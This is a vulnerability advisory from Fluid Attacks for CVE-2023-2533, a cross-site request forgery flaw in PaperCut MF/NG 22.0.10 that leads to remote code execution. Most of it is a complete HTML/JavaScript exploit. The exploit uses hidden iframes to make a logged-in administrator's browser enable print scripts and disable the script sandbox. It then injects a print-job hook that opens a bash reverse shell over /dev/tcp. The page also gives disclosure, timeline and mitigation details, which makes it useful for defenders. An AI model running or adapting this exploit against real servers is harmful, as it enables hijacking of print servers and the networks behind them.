---
slug: advisories/arcangel/
title: PaperCut MF/NG 22.0.10 - RCE via CSRF
authors: Carlos Bello
writer: cbello
codename: arcangel
product: PaperCut MF/NG 22.0.10 (Build 65996 2023-03-27) - Remote code execution via CSRF
date: 2023-06-13 12:00 COT
cveid: CVE-2023-2533
severity: 8.4
description: PaperCut MF/NG 22.0.10 (Build 65996 2023-03-27) - Remote code execution via CSRF
keywords: Fluid Attacks, Security, Vulnerabilities, RCE, CSRF, Papercut Ng, Papercut Mf, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="PaperCut MF/NG 22.0.10
   (Build 65996 2023-03-27) - Remote code execution via CSRF"
    code="[Arcangel](https://en.wikipedia.org/wiki/Arcángel)"
    product="PaperCut MF/NG"
    affected-versions="Version 22.0.10 (Build 65996 2023-03-27)"
    fixed-versions=""
    state="Public"
    release="2023-04-10">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Cross-site request forgery"
    rule="[007. Cross-site request forgery](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-007/)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H"
    score="8.4"
    available="Yes"
    id="[CVE-2023-2533](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2533)">
</vulnerability-table>

## Description

PaperCut MF/NG version 22.0.10 allows to persuade an administrator to alter
server configurations. This is possible because the application is vulnerable
to CSRF.

## Vulnerability

A Cross-Site Request Forgery (CSRF) vulnerability has been identified in
PaperCut NG/MF, which, under specific conditions, could potentially enable
an attacker to alter security settings or execute arbitrary code. This could
be exploited if the target is an admin with a current login session. Exploiting
this would typically involve the possibility of deceiving an admin into clicking
a specially crafted malicious link, potentially leading to unauthorized changes.

## Exploit

```html
<!DOCTYPE html>
<html>
    <body>
        <script>
            //Reset the configuration editor search field
            const resetSearchField = 'http://localhost:9191/app?service=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=&doQuickFind=Continuar';
            //Set Page 21
            const setPage21 = 'http://localhost:9191/app?service=direct/1/ConfigEditor/table.tablePages.linkPage&sp=AConfigEditor%2Ftable.tableView&sp=21';
            //Enable Print Script (print-and-device.script.enabled -> Y)
            const enablePrintScript = 'http://localhost:9191/app?service=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240%2C%24TextField%240%240%2C%24Submit%241%2C%24Submit%240%240%2C%24TextField%240%241%2C%24Submit%242%2C%24Submit%240%241%2C%24TextField%240%242%2C%24Submit%243%2C%24Submit%240%242%2C%24TextField%240%243%2C%24Submit%244%2C%24Submit%240%243%2C%24TextField%240%244%2C%24Submit%245%2C%24Submit%240%244%2C%24TextField%240%245%2C%24Submit%246%2C%24Submit%240%245%2C%24TextField%240%246%2C%24Submit%247%2C%24Submit%240%246%2C%24TextField%240%247%2C%24Submit%248%2C%24Submit%240%247%2C%24TextField%240%248%2C%24Submit%249%2C%24Submit%240%248%2C%24MaskedTextField%2C%24Submit%2410%2C%24Submit%240%249%2C%24TextField%240%249%2C%24Submit%2411%2C%24Submit%240%2410%2C%24TextField%240%2410%2C%24Submit%2412%2C%24Submit%240%2411%2C%24TextField%240%2411%2C%24Submit%2413%2C%24Submit%240%2412%2C%24TextField%240%2412%2C%24Submit%2414%2C%24Submit%240%2413%2C%24TextField%240%2413%2C%24Submit%2415%2C%24Submit%240%2414%2C%24TextField%240%2414%2C%24Submit%2416%2C%24Submit%240%2415%2C%24TextField%240%2415%2C%24Submit%2417%2C%24Submit%240%2416%2C%24TextField%240%2416%2C%24Submit%2418%2C%24Submit%240%2417%2C%24TextField%240%2417%2C%24Submit%2419%2C%24Submit%240%2418%2C%24TextField%240%2418%2C%24Submit%2420%2C%24Submit%240%2419%2C%24TextField%240%2419%2C%24Submit%2421%2C%24Submit%240%2420%2C%24TextField%240%2420%2C%24Submit%2422%2C%24Submit%240%2421%2C%24TextField%240%2421%2C%24Submit%2423%2C%24Submit%240%2422&%24TextField%240=Failed+to+send+your+scanned+fax+document&%24TextField%240%240=Y&%24TextField%240%241=Your+scanned+document+is+too+big%3A%25files%25You+can+try+reducing+the+scanned+document+size+by+using+a+lower+resolution%2C+or+switching+color+mode+to+grayscale+or+black+and+white.+Alternatively%2C+you+can+try+splitting+your+job.If+you+need+to+send+a+larger+scanned+document%2C+please+contact+your+system+administrator.&%24TextField%240%242=Y&%24TextField%240%243=Y&%24TextField%240%244=Failed+to+send+your+scanned+document&%24TextField%240%245=300&%24TextField%240%246=N&%24TextField%240%247=N&%24TextField%240%248=NONE&%24MaskedTextField=&%24TextField%240%249=25&%24TextField%240%2410=DEFAULT&%24TextField%240%2411=&%24TextField%240%2412=&%24TextField%240%2413=Y&%24TextField%240%2414=N&%24TextField%240%2415=&%24TextField%240%2416=0&%24TextField%240%2417=N&%24TextField%240%2418=Y&%24Submit%2420=Actualizar&%24TextField%240%2419=30&%24TextField%240%2420=&%24TextField%240%2421=';
            //Set Page 22
            const setPage22 = 'http://localhost:9191/app?service=direct/1/ConfigEditor/table.tablePages.linkPage&sp=AConfigEditor%2Ftable.tableView&sp=22';
            //Disable Print Script Sandbox (print.script.sandboxed -> N)
            const disableSandbox = 'http://localhost:9191/app?service=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240%2C%24TextField%240%240%2C%24Submit%241%2C%24Submit%240%240%2C%24TextField%240%241%2C%24Submit%242%2C%24Submit%240%241%2C%24TextField%240%242%2C%24Submit%243%2C%24Submit%240%242%2C%24TextField%240%243%2C%24Submit%244%2C%24Submit%240%243%2C%24TextField%240%244%2C%24Submit%245%2C%24Submit%240%244%2C%24TextField%240%245%2C%24Submit%246%2C%24Submit%240%245%2C%24TextField%240%246%2C%24Submit%247%2C%24Submit%240%246%2C%24TextField%240%247%2C%24Submit%248%2C%24Submit%240%247%2C%24TextField%240%248%2C%24Submit%249%2C%24Submit%240%248%2C%24TextField%240%249%2C%24Submit%2410%2C%24Submit%240%249%2C%24TextField%240%2410%2C%24Submit%2411%2C%24Submit%240%2410%2C%24TextField%240%2411%2C%24Submit%2412%2C%24Submit%240%2411%2C%24TextField%240%2412%2C%24Submit%2413%2C%24Submit%240%2412%2C%24TextField%240%2413%2C%24Submit%2414%2C%24Submit%240%2413%2C%24TextField%240%2414%2C%24Submit%2415%2C%24Submit%240%2414%2C%24TextField%240%2415%2C%24Submit%2416%2C%24Submit%240%2415%2C%24TextField%240%2416%2C%24Submit%2417%2C%24Submit%240%2416%2C%24TextField%240%2417%2C%24Submit%2418%2C%24Submit%240%2417%2C%24TextField%240%2418%2C%24Submit%2419%2C%24Submit%240%2418%2C%24TextField%240%2419%2C%24Submit%2420%2C%24Submit%240%2419%2C%24TextField%240%2420%2C%24Submit%2421%2C%24Submit%240%2420%2C%24TextField%240%2421%2C%24Submit%2422%2C%24Submit%240%2421%2C%24TextField%240%2422%2C%24Submit%2423%2C%24Submit%240%2422%2C%24TextField%240%2423%2C%24Submit%2424%2C%24Submit%240%2423&%24TextField%240=DEFAULT&%24TextField%240%240=Y&%24TextField%240%241=DEFAULT&%24TextField%240%242=DEFAULT&%24TextField%240%243=Y&%24TextField%240%244=1440&%24TextField%240%245=&%24TextField%240%246=-1&%24TextField%240%247=40&%24TextField%240%248=20&%24TextField%240%249=2&%24TextField%240%2410=-1&%24TextField%240%2411=3.0&%24TextField%240%2412=DEFAULT&%24TextField%240%2413=DEFAULT&%24TextField%240%2414=-1&%24TextField%240%2415=N&%24Submit%2416=Actualizar&%24TextField%240%2416=0&%24TextField%240%2417=&%24TextField%240%2418=N&%24TextField%240%2419=1683262800000%2C0.0&%24TextField%240%2420=1683262800000%2C1&%24TextField%240%2421=1683262800000%2C1&%24TextField%240%2422=1683262800000%2C1&%24TextField%240%2423=1683262800000%2C1';
            //Inject Shell in Papercut NG
            var injectShell = 'http://localhost:9191/app?service=direct%2F1%2FPrinterDetails%2F%24PrinterDetailsScript.%24Form&sp=S0&Form0=printerId%2CenablePrintScript%2CscriptBody%2C%24Submit%2C%24Submit%240%2C%24Submit%241&printerId=PRINTERID&enablePrintScript=on&scriptBody=function+printJobHook%28inputs%2C+actions%29+%7B%0D%0A++with+%28new+JavaImporter%28java.lang%29%29+%7B%0D%0A++++var+processBuilder+%3D+new+ProcessBuilder%28%22bash%22%2C+%22-c%22%2C+%22%24%40%7C+bash+-i+%3E%26+%2Fdev%2Ftcp%2Flocalhost%2F7777+0%3E%261%22%29%3B%0D%0A++++var+process+%3D+processBuilder.start%28%29%3B%0D%0A++%7D%0D%0A%7D%0D%0A%0D%0A&%24Submit%241=Aplicar';

            async function loadIframes() {
                await loadIframe(resetSearchField);
                await sleep(1000);
                await loadIframe(setPage21);
                await sleep(1000);
                await loadIframe(enablePrintScript);
                await sleep(1000);
                await loadIframe(setPage22);
                await sleep(1000);
                await loadIframe(disableSandbox);
                await sleep(1000);
                for (let printer_id = 1002; printer_id <= 1024; printer_id++) {
                    //It is not necessary to prefix the letter "l" in the post application
                    injectShell = injectShell.replace("PRINTERID", printer_id)
                    await loadIframe(injectShell);
                }

                function loadIframe(url) {
                    return new Promise((resolve) => {
                        const iframe = document.createElement('iframe');
                        iframe.src = url;
                        iframe.style.display = 'none';
                        iframe.onload = () => {
                            resolve();
                        };
                        document.body.appendChild(iframe);
                    });
                }

                function sleep(ms) {
                    return new Promise((resolve) => setTimeout(resolve, ms));
                }
            }
            loadIframes();
        </script>
    </body>
</html>
```

## Evidence of exploitation

It is important to clarify that we only need an administrator to perform the
necessary configurations with the CSRF that will later enable the RCE. This
RCE is triggered when anyone on the network sends a print job to an infected
printer.

Unlike administrators, a user without administrative privileges, within the
network where the printers are configured, will need the [Mobility Print](https://chrome.google.com/webstore/detail/mobility-print/alhngdkjgnedakdlnamimgfihgkmenbh)
extension to be able to see the printers configured by the administrator of
the PaperCut instance, and thus be able to send the print job to the infected
printer.

<iframe src="https://www.veed.io/embed/47a753c5-ab50-4310-b16a-0d5779f698ae"
width="835" height="504" frameborder="0" title="RCE-PaperCut-22.0.10"
webkitallowfullscreen mozallowfullscreen allowfullscreen controls
loading="lazy"></iframe>

## Our security policy

We have reserved the ID CVE-2023-2533 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: PaperCut MF/NG 22.0.10 (Build 65996 2023-03-27)

* Operating System: MacOS

## Mitigation

An updated version of PaperCut is available at the vendor page.

## Credits

The vulnerability was discovered by [Carlos
Bello](https://www.linkedin.com/in/carlos-andres-bello) from Fluid Attacks'
Offensive Team.

## References

**Vendor page** <https://www.papercut.com/>

**PaperCut NG/MF Security Bulletin (June 2023) | CVEs addressed** <https://www.papercut.com/kb/Main/SecurityBulletinJune2023#cves-addressed>

## Timeline

<time-lapse
  discovered="2023-05-04"
  contacted="2023-05-04"
  replied="2023-05-04"
  confirmed="2023-05-08"
  patched="2023-06-09"
  disclosure="2023-06-13">
</time-lapse>
